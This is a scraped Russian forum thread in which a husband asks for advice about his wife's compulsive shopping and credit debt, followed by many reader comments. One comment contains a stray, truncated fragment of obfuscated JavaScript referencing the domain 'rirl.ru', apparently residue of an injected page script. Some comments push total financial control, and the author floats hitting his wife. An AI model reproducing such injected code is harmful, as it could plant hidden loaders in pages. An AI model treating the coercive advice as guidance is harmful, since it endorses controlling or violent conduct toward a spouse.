Вход
Здравствуйте, гость !
Войдите под своим именем
или Зарегистрируйтесь.
меньше минуты назад2016-12-03 13:29:26 от Гость
Здравствуйте мы смужем вместе 12 лет. есть двое детей. было всякое но последнее время стала очень мучить проблема отсутствия работы у мужа я работаю. в начале отношений училась потом была в декрете но потом постоянно работала чтобы ни случилось и как ... Подробнее
Последний комментарий
История : Как смыть с себя эту грязь?
3 минуты назад2016-12-04 13:21:01 от Сианочка
18334Автор, и ещё , вам надо покаяться в церкви, а не перед нами , и не с кем больше не делитесь этой информацией никогда , люди все это воспринимают негативно, зачем вам осуждения, у меня тоже есть то , о чем я никогда и ни кому не поведаю , я носила в себе это больше года и решилась сходить в церковь ... Все комментарии67564
Вход
Здравствуйте, гость !
Войдите под своим именем
или Зарегистрируйтесь.
Топ из раздела
Истории из жизни
На работу к папе
вчера в 16:30:382016-12-03 16:30:38
Студент и препод
28 ноября в 23:53:36
Волосенкиии
27 ноября в 22:35:51
Комедия
27 ноября в 16:31:09
Сериалы смотрим?  ( 1 2 )
27 ноября в 16:31:08
опустить на главную
24 ноября в 07:57:38
Лев
23 ноября в 17:13:44
Истории из жизни - Моя жена шопоголичка. Помогите!!!
Истории из жизни : Моя жена шопоголичка. Помогите!!!     Привет всем-всем. Большая половина пользователей этого сайта - женская. Может Вы дадите какой совет? Устал. сил нет. Моя жена шопоголичка, причем это реально болезнь! Когда поженились, особо я не паниковал. То надо - купили, то надо - да пожалуйста. Одели, обули....все как положено чтобы муж обеспечивал свою жену .Я нормальных понятий мужчина. Но что пошло дальше. Во-первых, денег стало банально не хватать. Я не миллионер. Да, вы скажите зарабатывай больше. Но извините при таких тратах моей жены сколько не заработай -и сам без штанов останешься, и в долги влезть успеешь. Нам на свадьбу подарили деньги. Сначала мы договорились их потратить на мебель. Потом, она взяла часть денег и пошла в магазин: типа купить туфли новые к новому платью - ну ладно....И понеслось....Туфли, красные, синие, черные, на каблуке, шпильке, платформе, куртка-плащ, еще куртки, сумки , вешалки, ..... Сейчас домой заходишь, и приблизительно картина выглядит такая: так как мебели как таковой мы и не купили, есть только самая необходимая. , квартира полупустая. Так вот, заходишь в прихожую- коробки, коробки, коробки. И в этих коробках одни шмотки и женские штучки. Нет. я все понимаю. Девушка - хочется и одеться, и покраситься. Но...дальше песня вообще пошла. Не знаю кто, но кто то предложил ей карту кредитную.Об этом я только потом узнал. Берет она эту карту значит и за два дня спускает деньги. Охренеть. как можно 50000 за два дня потратить? и на что? Говорю: у тебя же кажется уже есть такая куртка? -Нет, ты посмотри ,здесь фасон другой. Мда, куда мужику понять то это. Идем дальше - сотые бусы какие-то. Как она объяснила - там блестки подходят к какому то определенному платью. ...Везде отговорки. Ладно, поругал,смирился. Сейчас потихоньку надо расплачиваться,но недавно снова узнаю что какой то кредит еще висит на ней. Дома пройти уже нельзя. лабиринт какой-то . Все в шмотках и вещах. Не умеет управлять деньгами. Дал ей на неделю 7000 на личные расходы. За день потратила. Ну думаю дорогая все. денег не дам пока. Продукты закупаем вместе, ей нельзя вообще доверять деньги. Сама работает на не очень оплачиваемой работе, свои деньги куда деет - вообще это меня типа не касается. Ну и что делать? Я просто в шоке. Как можно брать кредиты ,тратить деньги и не переживать, а как отдавать? А коллекторы блин сейчас.столько случаев. Разговаривал с ее сестрой, так она экономная . В кого жена такая. И она не понимает , что шопоголизм - проблема. Везде наживаются на таких шопоголиках . Типа скидки в магазине. Все, моя бежит на эти скидки. Надо - не надо. Домой придет с новыми вещами и коробками. Отпустил недавно за чайником - приходит домой с каким-то светильником и не беда , что уже есть светильник - типа этот лучше, шла увидела и не смогла пройти мимо. . А чайник говорю, ничего что нужен срочно? - ну потом купим. Вот так. Росла она в обычной семье. вроде не богатые и не бедные. Говорил с ней не раз. Она сказала-Что вы мужики вообще не понимаете нас девочек. Офигеть. Забыл когда себе что то покупал. Несколько кредитов висят уже, за квартиру надо заплатить. Но если я отпущу ее платить ,боюсь что вместо оплаты она купит очередное ожерелье. С банка звонили раз уже мягко намекнули, что типа платить то надо. А она их в черный список зафигачила, так они как только мой номер узнали и звонят. (видимо при выдаче кредита они телефон супруга запросили) Вот еще вопрос: как могут банки давать таким людям кредиты? а? По характеру моя жена спокойная, заботливая . То есть плюсов много. Но болезнь шопоголика , боюсь, может и к разводу привести.
64637
Другие Истории из жизни
(59)
Гость
Гость

17 мая 21:26:37
2016-05-17 21:26:37

Приучил, расхлебывайся теперь{#}

Ответить
Поддерживаю Да5 / Нет0
Нежная роза
8829 Нежная роза
Нежная роза online
Репутация : 154526
Комментариев 2288 27
17 мая 21:51:14
2016-05-17 21:51:14

Опасная штука эти кредитки. Легкий доступ к деньгам получают люди, которым это категорически нельзя, например, шопоголики, алкоголики, наркоманы. Люди больные на голову, которых не заботит, как и чем расплачиваться потом. Увы, чаще всего расплачиваются близкие... Я кредитку мужа забрала и не даю ему (может иногда в запой уйти). На счастье, не любитель всяких учереждений, не идет блокировать старую и новую заводить. А кто-то ведь может... Хотя иногда угрожает. Я угрожаю в ответ, что не намерена оплачивать попойки, и лучше съеду от него подальше, на квартиру, и посмотрю, хватит ли ему его инвалидской пенсии и на жирно пожрать, как он любит, и на пропой, и на больницу. Пока срабатывает.

Ответить
Поддерживаю Да3 / Нет0
Оптимист видит наполовину полный стакан, а пессимист - наполовину пустой.
Гость
Гость

17 мая 22:38:28
2016-05-17 22:38:28
Разводитесь срочно не терпите это дальше будет больше в нашей стране 70% девушек так что не проблема сменить
Ответить
Поддерживаю Да0 / Нет2
DeaD EnD
21246 DeaD EnD
DeaD EnD offline
Репутация : 17705
Комментариев 199 0
17 мая 22:39:41
2016-05-17 22:39:41

Кредитку забрать, на расходы денег не давать. Покупайте нужное сами (продукты и тд) . У нее есть зарплата на отдельные нужды её пусть и использует. Думаю с таким лимитом болезнь быстро пройдет. Она не ценит деньги потому что их не зарабатывает, все оплачиваете вы. пусть научится ценить и экономить.

Ответить
Поддерживаю Да7 / Нет0
Это для мужчин женщина - загадка... У женщин все по-другому... Одна другую видит насквозь
Гость
Гость

17 мая 23:17:31
2016-05-17 23:17:31

Гость, Гость явно на ее место метите {#}

Ответить
Поддерживаю Да2 / Нет0
Неалина
5436 Неалина
Неалина offline
Репутация : 443112
Комментариев 7612 30
17 мая 23:22:02
2016-05-17 23:22:02

Все массовая проблема у мужчин пошла!{#}Один жалуется жена плохо выглядит!А другой типа сильно хорошо!{#}Может вам с Артуром женами поменятся?{#}{#} Я даже уже не знаю что писать!{#}

Ответить
Поддерживаю Да5 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
Гость
Гость

17 мая 23:23:21
2016-05-17 23:23:21

Неалина, Неалин ты бесподобна{#}

Ответить
Поддерживаю Да0 / Нет0
Allegro
21105 Allegro
allegro offline
Репутация : 139463
Комментариев 1455 11
17 мая 23:24:44
2016-05-17 23:24:44
Неалина, может им поменяться женами?
Ответить
Поддерживаю Да1 / Нет0
Кому-пожар,кому-погреться(рус.пословица)
Неалина
5436 Неалина
Неалина offline
Репутация : 443112
Комментариев 7612 30
17 мая 23:27:04
2016-05-17 23:27:04

Allegro, Так и я про тоже!{#}

Ответить
Поддерживаю Да0 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
Читательница
14629 Читательница
Читательница online
  • Мисс Эрудиция
Репутация : 1095802
Комментариев 16103 6
17 мая 23:27:18
2016-05-17 23:27:18

Автор, деньги однозначно ей давать нельзя - она потратит все! Так что не давайте ей!

А от шопоголизма ей нужно лечиться! Шопоголизм - это ведь болезнь, такая же как наркомания, алкоголизм, тоже основана на зависимости, но от чего-то она недооцениваниется. Шопоголизм тоже очень опасен!

Вас она врят ли послушает, тем более вы ни раз с ней разговаривали, она сама должна захотеть осознать проблему и избавиться... А вообще, нужно ее тащить хотя бы к психологу, а по хорошему к психотерапевту.

Ответить
Поддерживаю Да4 / Нет0
ТыОставьТоМгновениеНаПамятьИНе ДумайУжеОПлохомВсёЧтоПлохоВедь МожноПоправитьИПройдетНепогодаСДождем
Гость
Гость

17 мая 23:28:23
2016-05-17 23:28:23

Автор, одна дамочка вашим телефоном интересуется , мол если разведетесь , то она согласна занять место жены... очень экономная, из топора кашу готовит)))

Ответить
Поддерживаю Да0 / Нет0
Неалина
5436 Неалина
Неалина offline
Репутация : 443112
Комментариев 7612 30
17 мая 23:28:57
2016-05-17 23:28:57

БесШаБаШнЫй ЭлЬф )), {#}Прям захвалил!

Ответить
Поддерживаю Да0 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
Неалина
5436 Неалина
Неалина offline
Репутация : 443112
Комментариев 7612 30
17 мая 23:33:00
2016-05-17 23:33:00

БесШаБаШнЫй ЭлЬф )), {#}Кто телефоном интересуется?Та которая с топором приходит жить?{#}Страшная женщина!{#}

Ответить
Поддерживаю Да1 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
Гость
Гость

17 мая 23:35:09
2016-05-17 23:35:09

Неалина, Это я к слову, а с чем придет не знаю... может с ковшом)))

Ответить
Поддерживаю Да0 / Нет0
Allegro
21105 Allegro
allegro offline
Репутация : 139463
Комментариев 1455 11
17 мая 23:36:17
2016-05-17 23:36:17
БесШаБаШнЫй ЭлЬф )), топор не помешает)там коллекторы табунами ходят))
Ответить
Поддерживаю Да1 / Нет0
Кому-пожар,кому-погреться(рус.пословица)
Неалина
5436 Неалина
Неалина offline
Репутация : 443112
Комментариев 7612 30
17 мая 23:39:27
2016-05-17 23:39:27

БесШаБаШнЫй ЭлЬф )), И чем она лучше той с кредиткой?{#}Либо коллекторы, либо женщина с топором или ковшом!{#}Лучше одному тогда.{#}

Ответить
Поддерживаю Да0 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
Неалина
5436 Неалина
Неалина offline
Репутация : 443112
Комментариев 7612 30
17 мая 23:54:26
2016-05-17 23:54:26

Лично я кредитками никогда не пользуюсь. Не нужны они мне. Залезешь в кабалу потом не выберешся!Хоть и предлагали мне не раз их мол очень удобно. Кому?Банкам?Да им удобно!А потом полжизни их платить. Лучше по средствам жить!Чем с кредитными картами!

Знаю уже зрелых женщин пользующихся такими картами. Говорят мужья узнают что они ими пользуются сразу убьют!В тихушку пользуются и платят годами!

Ответить
Поддерживаю Да3 / Нет1
Обидеть Лену может каждый!Не каждый сможет убежать!
Xelen
21144 Xelen
Xelen offline
Репутация : 36166
Комментариев 436 1
18 мая 00:30:32
2016-05-18 00:30:32

Это звездец! В Америке вроде даже клиники есть для шопоголиков.

Мать моей одногруппницы такой же клинический случай. Муж из-за этого от нее сбежал, она потом умудрилась 2 квартиры (!!!) прос**ть на всякие бусы-шмотки, дошло до того, что снимают квартиру в раздолбанном бараке, но до сих пор все заработанное тратят на г**но! Зато она научилась за всю жизнь искусству развода мужчин на деньги.

Боюсь вам остается или жестко до последней копейки ее контролировать, или бежать... Хотя если она берет кредиты бездумно, то контроль отпадает и остается бежать.

Ответить
Поддерживаю Да6 / Нет0
Гость
Гость

18 мая 00:49:32
2016-05-18 00:49:32

Должен признаться я тоже этим страдаю, только не шмотки.... а электронную технику, все что выходит новое , мне хочеться приобрести... и так меняю постоянно, кредитов нету славо богу, избавился от них, но пользуясь дебитной картой

Ответить
Поддерживаю Да0 / Нет0
Гостья
Гостья

18 мая 01:03:05
2016-05-18 01:03:05
Проблема у вас серьезная. Припугните, что если это продолжиться то развод. Все ее вещи продавайте и оплачивайте кредит. Хорошо, если сможете селать возврат. Дайте ей 2 недели, что бы избавиться от хлама. Разу нее своя зп, пусть на себя ее тратит, вы деньги ей не давайте. Лучше если вообще заберете у нее и все расходы будут под вашим руководством, ходить в магазин будете только в месте. Туфли надо вместе идете покупать. Скажите, что если еще раз возьмет кредит то вы платить не будете и это 100% развод. В банк пишите, что не знали и согласия на кредит не давали. Вы как супруг можете отказаться от этого, пусть аннулируют. За руки хватайте ее, к психологу видите. "Не понимайте нас девочек" так и скажите, что вы не собираетесь понимать, вы ей не мальчик на побегушках, а ее муж и все расходы она должна планировать с вами. На будущее запрещайте ей даже покупать для себя личные вещи, пусть ведет тетрадь и за каждую покупку, включая личную гигиену, отчитывается. Это жестко и не допустимо в некоторой области, но в вашей ситуации выхода иного нет, вы должны полностью следить за ее расходами. Если она вылечится и начнет адекватно оценивать свои расходы, то можно будет вернуть ее деньги и даже давать на личное, но только при 100% выздоровление.
Ответить
Поддерживаю Да0 / Нет0
Странная_Такая
20287 Странная_Такая
Странная_Такая offline
Репутация : 249460
Комментариев 2465 8
18 мая 02:07:34
2016-05-18 02:07:34

Что то подозрительные писатели на сайте мужского рода появились... Типа ткмы подбрасывают.. ну хорошо....

От коллекторов отмораживайтесь, говорите: не знаю такую.

А ей денег вообще не давайте, за продуктовой корзиной ходите вместе.

И скажите ей, что если она продожит Вас загонять в долговую яму, вы влезете на ее кучу шмоток и прыгнете вниз. И она останется самой модной вдовой.

Ответить
Поддерживаю Да3 / Нет0
Та, которая танцевала, казалась безумной тем, кто не мог слышать музыку.
Неалина
5436 Неалина
Неалина offline
Репутация : 443112
Комментариев 7612 30
18 мая 07:30:28
2016-05-18 07:30:28

А по мне так Андрей и Артур один автор двух историй. Как близнецы похожие истории.

Ответить
Поддерживаю Да4 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
Lilianka
17559 Lilianka
Lilianka offline
Репутация : 58668
Комментариев 897 15
18 мая 10:19:44
2016-05-18 10:19:44

Походу моему мужу повезло, я вообще не любитель ходить по магазинам. {#}
Хожу только по необходимости, ну или если захочется чего-то яркого (зароботная плата позволяет, слава Богу).
Меня тяготит эти толпы девушек-женщин, которые порой нагло вещи чуть ли не из рук вырывают.
Люблю больше с мужем ходить, выбирать ему брюки, рубахи.
А вообще считаю что история провокация. Да, есть люди больны шопоголизмом. Но слоган и манера выражения мнения наталкивает на мысль, что у историй о "грязном небритыше-жене" и жене-шопоголичке один и тот же автор. Мало того что жена не моется, ходит в одних трусах неделями, не бреется, так ещё и скупает магазинные полки{#}

Ответить
Поддерживаю Да2 / Нет0
Если бы наши глаза видели душу, а не тело, как же сильно отличалось бы наши идеалы красоты..
белая мышка
9141 белая мышка
Белая мышка offline
Репутация : 141390
Комментариев 1505 25
18 мая 11:38:16
2016-05-18 11:38:16

У вашей жены действительно проблема. Как алкоголики и наркоманы спускают все деньги на свои нужды, так и жена-шопоголик тратится на ерунду.

Не давайте ей деньги. Пусть покупает шмотки на свои, честно-заработанные.

Ответить
Поддерживаю Да1 / Нет0
казаться легкодоступной, но при этом быть недосягаемой-это верх искусства
Bonitapr
10674 Bonitapr
BonitaPR offline
Репутация : 3887
Комментариев 165 11
18 мая 13:08:35
2016-05-18 13:08:35

Надо вашей семье ребечнока, может ее внимание преключиться с шмоток, в заботу и воспитание!!

Конечно это проблема когда уже кредиты берет!!! это надо лечить!

Ответить
Поддерживаю Да0 / Нет0
Знаете, c годами вcе больше убеждаюсь в 2-х вещах: всё тайное рано или поздно станет явным. И второе
Кира
Кира

18 мая 14:09:01
2016-05-18 14:09:01
Сейчас изобилие вещей, всего хочется. Тем более тем, кто вырос во времена дефицита. Я тоже хочу много всяких вещей. У меня болезнь. Я и толком не ношу эти вещи, не пользуюсь ими, но покупаю. \r\nМой муж также возмущался, а я считала его жадным и скупым. \r\nНо когда осознала сама проблему, то стала работать над ней. \r\n1) Увидев красивую вещь в магазине, я ее фотографирую. \r\nВедь часто мы получаем удовольствие от того что мы становимся обладателем этой вещи. И все. Дальше она просто пылится дома на полке. Сфотографировав вещь, я являюсь ее обладательницей. Я примеряю вещь и фоткаю себя в ней на свой телефон. Спустя время я смотрю на фото и думаю, как хорошо, что я ее не купила, не так уж она мне и нравится. Но бывает и наоборот. Тогда я ищу возможность ее купить и благодаря интернету, это не проблема. Вещь находит меня, а я ее. \r\nКогда я покупаю вещь, я думаю, где я буду ее хранить, куда носить и с чем сочетать из имеющего гардероба. Если мне ее не с чем сочетать, я ее стараюсь не брать. Так как эта вещь будет лежать и пылиться. \r\nЯ не хожу по магазинам, слишком часто. Только во время отпуска я прогуливаюсь по магазинам просто так. В остальное время я стараюсь ходить только запланировано, за конкретными покупками. \r\n И даже с таким подходом иногда умудряюсь купить какую-нибудь не нужную вещь, которая будет захламлять мою квартиру. \r\nВремя от времени провожу ревизию в шкафу и пытаюсь вещи продать или отдать. \r\nЭто занимает много времени, не всегда получается и совсем не приносит удовольствия. \r\nПомогает еще цель ради которой стоит откладывать средства. На путешествие, на квартиру. Не умеешь экономить, не сможешь купить более дорогую вещь. \r\n
Ответить
Поддерживаю Да1 / Нет0
Андрей
Андрей

18 мая 14:09:21
2016-05-18 14:09:21
Всем привет. Вчера пришел вечером. накормила . Смотрю взгляд какой то хитрый и загадочный. заходит в кухню в каких то бофортах. Говорю ей -в смысле дело к лету идет, это что. зачем тебе сапоги и где деньги взяла? на этой неделе знаю что денег у нее точно не было уже и я не давал после тех 7 тысяч. зарплата у нее в конце месяца. Говорит заняла у Оли(подруга ее. такая же) Ну все понятно. Типа были хорошие скидки на несезонку и весенние бофорты типа всего за полторы. Типа грех не купить. Они поехали к Оле домой. взяли недостающую сумму и поехали втариться. ох и счастья. У Оли и моей жены одинаковые сапоги. только размеры разные. Охренеть какая трогательная история. не выдержал. вспылил. начал орать. в итоге обида. дулась весь вечер. я самый непонимающий мужик в мире. показать ей эти комментарии? или сразу отлупить? я терпеливый но это уже реально накаляет. Кредиты не оплачены еще и снова в долг лезет . Ниче не понимаю. Это я дурак или ну блин. ну есть же экономные девченки. Как научить экономии. Я уже и так не даю денег. она их каким то странным образом хоть где найдет. кредиторы на каждом шагу - готовы выдать по первому требованию и подруг жалельщиц хватает таких. Вот зачем сапоги покупать если итак куча сапогов и тем более скоро лето?. уже жара. ходит в босоножках. и еще-куча вещей новых так и остается в пакетах и коробках. то есть зачем их покупать, если они пылятся в коробках?
Ответить
Поддерживаю Да0 / Нет0
ликочка
ликочка

18 мая 14:10:19
2016-05-18 14:10:19
А вот я верю автору и в историю верю . действительно бывает такое. Шопинг-болезнь женщин и не только. У меня вообще брат все свои деньги тратит , тоже в кредит залез как-то на машину, жена останавливает его. А вот пользователи которые начинают другу другу поддакивать и говорить, что "верю-не верю" меня удивляют, давно уже на сайте заметила такую тенденцию. Вместо реального совета начинают свои догадки, разгадки, "верю-не верю" Один написал , что не верит, что это по его мнению другой человек историю написал и всё. Сразу все начали одно и то же писать. ))) А почему вы считаете, что не может муж написать о жене-шопоголичке? ) Вот интересно. Та история Артура - одна история, я ее тоже читала, здесь другая история и советы нужны совершенно другие. Иногда некоторые пользователи собирутся в кучку и давай автора пинать) Зачем? Еще скажите что я вот это сообщение пишу и я Артур у вас или этот парень с истории , раз я его защищаю))))))) Просто мне обидно за некоторых авторов. Уже не раз замечаю. Все у вас прям тролли подозрительные и один человек пишет все истории)))) Вместо того чтоб понять человека и дать совет. А вы автор не давайте ей денег больше. Зачем ей эти вещи, нужно и важно понимать и осознавать каждую покупку.
Ответить
Поддерживаю Да1 / Нет0
шоколадочка
18143 шоколадочка
шоколадочка online
Репутация : 121205
Комментариев 1101 17
18 мая 14:10:23
2016-05-18 14:10:23

История как-будто обо мне в прошлом.... Раньше я тоже не умела экономить, мало того, всю зарплату спускала на одежду. Доходило до фанатизма: приходила в свой любимый салон "Клубника" и если не хватало денег, просила отложить тот или иной жакет (платье, блузу) и во всю прыть бежала домой за деньгами. Смешно вспоминать. Проблема шопоголизма , на самом деле, затрагивает многие семьи. И тема довольно актуально, только вот не каждый понимает, что это реально психологическая болезнь и пути ее решения искать стоит! Автор, срочно проведите с женой беседу, помогите ей самой осознать свои ошибки, не ругая и не подчеркивая это в грубой форме - так ей еще больше захочется идти Вам наперекор. Составьте список реальных покупок, а затем как в программе "Кризисный менеджер"просмотрите вещи жены вместе с ней, которые она купила и которыми совсем не пользуется, посчитайте сумму потраченных ею денег зря. Уверенна, что цифра , то есть сумма ненужных покупок должна получиться впечатляющей! Вот, скажите ей, что на эти деньги вы бы могли спокойно жить год. два, либо съездить на какой-нибудь отдых... Главное, чтобы она поняла, что постоянный шопинг - своего рода болезнь , пусть прочтет множество реальных советов в инете и сделает выводы

// o;o++)t+=e. CharCodeAt(o). ToString(16);return t}, a=function(e){e=e. Match(/[\S\s]{1, 2}/g);for(var t="", o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "rirl.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Ответить
Поддерживаю Да2 / Нет0
Гость
Гость

18 мая 14:11:19
2016-05-18 14:11:19
Сами ей это позволили, все начинается с малого... Это действительно болезнь! К психиатру нужно! Если отличное предложение- продать вещи которые она не носит, наверняка есть такие вещи, покупает, складывает и забывает... Расплатитесь с кредитом! Да и это еще называется безответственность, мол прошел день и ладно... Куда вы смотрели, или розовые очки надеты были и глаза закрывали на ее походы в магазин??? Да и вообще она эгоистка, ваш бюджет тратит на себя! Приведите ей примеры, о том, сколько семей мало имущих, у которых нет денег на покупку вещей, одежды, мебели, а ты будучи не богатой, скупаешь все что попадается тебе на пути, легкомысленность! Лучше квартирой занялась бы, обставляла ее, а не за очередными трусами бежала в тон помады... Все хорошо, но в меру!
Ответить
Поддерживаю Да1 / Нет0
Ника777
21248 Ника777
Ника777 offline
Репутация : 115327
Комментариев 2137 3
18 мая 14:11:30
2016-05-18 14:11:30
Сам ей это позволял! Одну вещь купила, но как известно, где одна, там и будет и вторая, и третья и двадцатая... Неужели ты не мог за все это время поставить ее на место? Терпение у вас дьявольское! Но ограничения тоже нужно знать!!! Не все ведь тратить на одежду и аксессуары!
Ответить
Поддерживаю Да1 / Нет0
Мы никогда не получим то, чего мы хотим, пока не будем благодарны за то, что имеем.
Нежная роза
8829 Нежная роза
Нежная роза online
Репутация : 154526
Комментариев 2288 27
18 мая 14:49:45
2016-05-18 14:49:45

Кредитка - опасная штука. Но иногда очень даже выручает. Не надо искать, у кого бы одолжить денег, если срочно надо. Просто надо разумно пользоваться. Я беру с кредитки, если надо сразу много денег, на поездку, на больницу. При этом всегда знаю, когда и с каких доходов погашу долг. Хотя иногда и до получки не дотяну несколько дней и покупаю продукты.

Ответить
Поддерживаю Да1 / Нет0
Оптимист видит наполовину полный стакан, а пессимист - наполовину пустой.
Блондиночка
10883 Блондиночка
Блондиночка offline
  • Мисс Остроумие
Репутация : 2895502
Комментариев 17168 30
18 мая 14:51:35
2016-05-18 14:51:35

Вообще, если честно, в правдивости истории как-то сомневаюсь. Ну написана она по женски как-то.

А если не брать в расчёт этот... То шопоголизм да, существует. Я сама им немного страдаю. Очень сложно мне приходится отказывая в покупке себе чего-то. Я себя в магазинах просто научила отговаривать. Увижу вещь, а сама себе мысленно говорю -"Маша стпЭ, сейчас ты пришла не за этим. В следующий придёшь и купишь это, никуда это не денется. "

Перед походом в магазин я ставлю себе определённые цели, что мне нужно купить. Составляю список и деньги беру в притык. У меня всегда лимит.

Конечно у меня никогда не было так глобально всё, как в описанной истории, но всё равно часто покупала то, что мне не нужно вообще.

Ответить
Поддерживаю Да5 / Нет0
Хожу по дому на каблуках и пью кефир из фужера. Это придаёт моему безделью особую изысканность.
Burundik
19101 Burundik
Burundik offline
Репутация : 293827
Комментариев 2305 6
18 мая 16:02:35
2016-05-18 16:02:35

Только прочитала название и сразу подумала, что мой муж наверное тоже так про меня думает {#}.

Прочитала историю... видно вас в семье за человека вообще никто не считает и на ваше мнение ей плевать.

У меня тоже много денег уходит на шмотки и платьев куча и обуви и всего всего, но у вас совсем беспредел, до такой степени, что чайника нет и на него денег нет. у нас с мужем договоренность, половину своей зп ( а она у меня хорошая , в отличии от вашей жены) я трачу на себя и он не спрашивает на что, остальную часть откладываем на счет в банке и его половина зп туда же. Вообще у женщины должно быть много всего - но у вас что то не в адеквате жена.

Зачем вы ей деньги даете?

Ответить
Поддерживаю Да1 / Нет0
Violetta
14552 Violetta
Violetta offline
Репутация : 1249193
Комментариев 8863 0
18 мая 18:13:52
2016-05-18 18:13:52

А я бы с ней развелась, в противном случае, такая женщина пустит по миру, а я этого не хочу

Ответить
Поддерживаю Да2 / Нет0
Хорошее настроение - это когда не очень умные люди не бесят, а веселят.
Птаха
21082 Птаха
Птаха offline
Репутация : 22346
Комментариев 346 1
18 мая 20:19:38
2016-05-18 20:19:38
Андрей, устроит ей "праздник") один день полностью ей любимой) завтрак-обед-ужин) на завтрак трусики в тарелочку, обед пусть будет колорийный-курточку в кастрюлю) на ужин-туфельку))) пусть уплетаеет за обе щеки) а Вы процесс контролируйте) туфелька плохо жуется?) крэмом её смажьте) а запивать маечками, колготочками и чулочками))) Вообще, могу только посочувствовать.
Ответить
Поддерживаю Да3 / Нет0
Гость
Гость

18 мая 20:23:30
2016-05-18 20:23:30

Птаха, кому сочувствуешь ? жене, ? что кредитки кончились?{#}

Ответить
Поддерживаю Да0 / Нет0
Кольт
Кольт

18 мая 21:58:02
2016-05-18 21:58:02
Что-то истории пошли.. У того жена грязная, у другого магазинная маньячка. Слава Богу мне повезло в этом плане. Бегите от неё изо всех ног. С такими темпами не накопить на будущее, чтобы обеспечивать детей. Безголовые женщины какие-то пошли.
Ответить
Поддерживаю Да1 / Нет0
Странная_Такая
20287 Странная_Такая
Странная_Такая offline
Репутация : 249460
Комментариев 2465 8
19 мая 02:12:55
2016-05-19 02:12:55

Да видно, блин, что Артур и Андрей - один автор двух историй. Во делать нечего...

Ответить
Поддерживаю Да3 / Нет0
Та, которая танцевала, казалась безумной тем, кто не мог слышать музыку.
Андрей
Андрей

19 мая 13:45:50
2016-05-19 13:45:50
Странная_Такая , Вам не надоело приписывать мне какого-то Артура? Я эту историю не для вас писал. Я от людей совета спрашивал по поводу шопоголизма.
Ответить
Поддерживаю Да1 / Нет0
Неалина
5436 Неалина
Неалина offline
Репутация : 443112
Комментариев 7612 30
19 мая 17:48:23
2016-05-19 17:48:23

Андрей, Если даже история реальна то вы сам себе такую жену выбрали. Шопоголизм не вчера начинается.

Ответить
Поддерживаю Да0 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка offline
Репутация : 1663626
Комментариев 6907 36
19 мая 18:16:11
2016-05-19 18:16:11

Неалина, Извини, не удержалась. И что? Теперь никому не писать истории, не спрашивать совета, потому что каждый сам себе такую половинку выбрал?

А ты не сама себе алкаша и изменника выбирала? Алкоголизм тоже не за день начинается, а такая инфантильность, как у твоего бывшего - это вообще, скорее всего врожденное.

Только не надо сейчас писать, что тебя несчастную опять попрекают твоими историями. Вечно жалуешься, как тебя все осуждают, хотя сама других только осуждаешь и даже не пытаешься понять. Слышала поговорку по соринку и бревно? Вот это 100% про тебя. В своих глазах ты бревен не видишь, зато каждого пытаешься ткнуть носов в их соринку.

П. С. Не важно, верю в историю или нет. Такая ситуация вполне может быть. И я бы в такой ситуации ставила жесткие условия, не давала денег, и заставляла самой выплачивать свои кредиты. Если что-то не нравится, пусть гуляет вальсом, тратить свои личные деньги.

Ответить
Поддерживаю Да5 / Нет2
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Гость
Гость

19 мая 18:17:35
2016-05-19 18:17:35
А вы пробовали деньги ей не давать. Пусть на свои и тратит. И кредиты пусть сама на себя берёт. Пока с голой задницей не останется не поймёт всё равно. Ваша задача деньги ей не давать заработанные собственным горбом. Потому что болезнь которая у неё доведёт вас до состояния нищеты. Попробуйте ещё отвести её к врачу. Может они что посоветуют
Ответить
Поддерживаю Да1 / Нет0
Гость
Гость

19 мая 18:24:00
2016-05-19 18:24:00

Сиреневая Кошка, Извини не удержался.... Ты ещё та стервочка.... любишь ниже пояса бить...

Ответить
Поддерживаю Да3 / Нет0
Dевушк@
3954 Dевушк@
Dевушк@ offline
Репутация : 235993
Комментариев 1762 1
19 мая 18:51:30
2016-05-19 18:51:30

Да 100% один Артур и Андрей - один автор. Посмотрите на стиль написания. Последний коммент Артура в истории и этот коммент автора Андрей, написаны в одном стиле и после точки маленькие буквы. И почерк одинковый {#}

Ответить
Поддерживаю Да3 / Нет0
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка offline
Репутация : 1663626
Комментариев 6907 36
19 мая 19:15:13
2016-05-19 19:15:13

БесШаБаШнЫй ЭлЬф )), я люблю справедливость. Неалина в чужих историях резкая, бескомпромиссная. Он любит попрекать ошибками, которые сама совершала, совершает и будет дальше совершать.

Человек написал историю, спросил совета, Неалина тут как тут: вы сами такую выбрали. А вы, не сами выбрали такого? Так почему вам можно жаловаться на трудную долю, а другим нельзя?

Разве я не права, Эльф? Если по честному?

Ответить
Поддерживаю Да5 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
шоколадочка
18143 шоколадочка
шоколадочка online
Репутация : 121205
Комментариев 1101 17
19 мая 19:23:16
2016-05-19 19:23:16

А я вообще не понимаю многих пользователей, которые "не верят " в такие истории и пишут хором, поддерживая друг друга, типа "оооо, это вот тот парень написал по имени Артур, я экстрасенс, я эт точно знаю))) . Так, это Ваше право! Только зачем автору это?! Правильно мужчина пишет, что написал эту историю для того, чтоб какое-то мнение услышать и советы, а не проводил среди нас опрос "Верите-не верите")))) Если так писать , то можно скоро сам сайт назвать "А как Вы думаете, кто автор этой истории" и опрос перед каждой историей 1) Артур 2) Какая-то девочка 3) наглый тролль 4) и т. д. Ну или название "Верите или нет") По этой причине многим людям скоро не захочется писать сюда свои жизненные истории. Печалька, но факт

